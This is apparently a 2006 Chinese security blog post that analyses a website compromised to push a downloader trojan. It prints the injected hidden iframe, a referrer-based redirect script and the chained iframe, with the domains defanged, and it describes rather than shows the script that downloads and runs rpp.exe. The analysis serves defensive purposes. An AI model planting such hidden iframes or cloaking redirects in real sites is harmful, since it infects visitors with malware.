一个下载木马的网站

endurer 原创
2006-08-21 第1


网站首页插入如下代码:
/------------
<iframe src="hxxp://www.ac***66.cn/8***8/index.htm" width="0" height="0" frameborder="0"></iframe>
------------/

hxxp://www.ac***66.cn/8***8/index.htm 的内容为:
/--------
<SCRIPT language="JavaScript">
function cameFrom(where) {
   if (!document.referrer && !where) return true;
   else return (document.referrer.indexOf(where)>=0)
   }

if (cameFrom("nen.com.cn")) {
   location.replace("3721.htm");
   }

else if (cameFrom("gov")) {
  location.replace("3721.htm");
   }

else if (cameFrom("or")) {
   location.replace("3721.htm");
   }

else if (cameFrom("bi")) {
   location.replace("3721.htm");
   }

else if (cameFrom("1488.com")) {
   location.replace("3721.htm");
   }

else {
   location.replace("mm.htm");
   }
</SCRIPT>
--------/


hxxp://www.ac***66.cn/8***8/mm.htm 的内容为:
/--------
<iframe src="hxxp://www.ac***66.cn/8***8/joke.htm" width="0" height="0" frameborder="0"></iframe>

<script src='hxxp://s**59.cnzz.com/stat.php?id=230393&web_id=230393&show=pic' language='JavaScript' charset='gb2312'></script>
--------/

hxxp://www.ac***66.cn/8***8/joke.htm 的内容为JavaScript脚本,由于其中包含了攻击者所属组织和QQ号,所里不公开具体内容。

该脚本利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 hxxp://www.ac***66.cn/8***8/rpp.exe, 保存为 IE临时文件夹中的 g0ld.com,并利用Shell.Application 对象 的 ShellExecute 方法 来运行。(这与 小心通过QQ尾巴中的网址(Q-Zone.****qq.C0M)传播的维金/Viking蠕虫  中第二段脚本程序相似)


g0ld.com               Kaspersky 报为 Trojan-Downloader.Win32.Delf.asb,瑞星报为 Trojan.DL.Delf.csh 

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

紫郢剑侠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值